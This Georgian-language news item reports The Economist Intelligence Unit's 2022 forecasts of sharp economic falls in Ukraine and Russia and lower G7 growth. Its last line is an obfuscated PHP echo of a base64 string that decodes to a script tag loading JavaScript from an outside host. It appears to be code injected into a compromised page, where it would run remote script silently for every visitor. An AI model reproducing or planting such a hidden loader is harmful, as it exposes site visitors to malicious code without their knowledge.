celsiusi
ავერსი საქკაბელი
ბრიტანული The Economist-ი განახლებულ ეკონომიკურ პროგნოზს აქვეყნებს. გამოცემის Economist Intelligence Unit-ის შეფასებით, ომის შედეგად უკრაინის ეკონომიკა წელს 46.5%-იან ვარდნას განიცდის.
 
უზარმაზარი ადამიანური მსხვერპლის, განადგურებული ინფრასტრუქტურის, ეკონომიკის აღდგენის სირთულეებიდან გამომდინარე მოსალოდნელია, რომ უკრაინა ეკონომიკის ომამდელ დონეს 2030-იანი წლების ბოლოსთვის დაუბრუნდება.
 
The Economist-ი მოელის, რომ წელს რუსეთის ეკონომიკა 10%-ით შემცირდება, რაც იმაზე დიდი ეკონომიკური ვარდნაა, რაც რუსეთმა 1998 წლის ფინანსური კრიზისის დროს განიცადა.
 
საერთაშორისო სანქციების, კაპიტალის გადინების, რუბლის გაუფასურების, ნავთობ-ექსპორტის მიმართ დაწესებული სანქციების გათვალისწინებით რუსული ეკონომიკა უმძიმეს კრიზისში შევა. The Economist-ი მოელის, რომ რუსეთი ომამდელ ეკონომიკურ დონეს მხოლოდ 2025 წლისთვის მიაღწევს.
 
რაც შეეხება გლობალურ ეკონომიკურ ზრდას, ის 2022 წელს 3.4%-ზე არის პროგნოზირებული, რაც წინა პროგნოზთან შედარებით ნახევარი პროცენტული პუნქტით უფრო დაბალია.
 
დიდი შვიდეულის ქვეყნებში წელს ეკონომიკური ზრდის პროგნოზი ასეთია:
 
● აშშ - ზრდა 2022 წელს 3%, კლება წინა პროგნოზთან 0.4%;
● საფრანგეთი - ზრდა 2022 წელს 3.4%, კლება წინა პროგნოზთან 0.7%;
● გერმანია - ზრდა 2022 წელს 2.5%, კლება წინა პროგნოზთან 0.8%;
● იტალია - ზრდა 2022 წელს 3.4%, კლება წინა პროგნოზთან 1%;
● იაპონია - ზრდა 2022 წელს 2.8%, კლება წინა პროგნოზთან 0.2%;
● დიდი ბრიტანეთი - ზრდა 2022 წელს 3.9%, კლება წინა პროგნოზთან 0,1%;
● კანადა - ზრდა 2022 წელს 3.8%, უცვლელია.
846
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");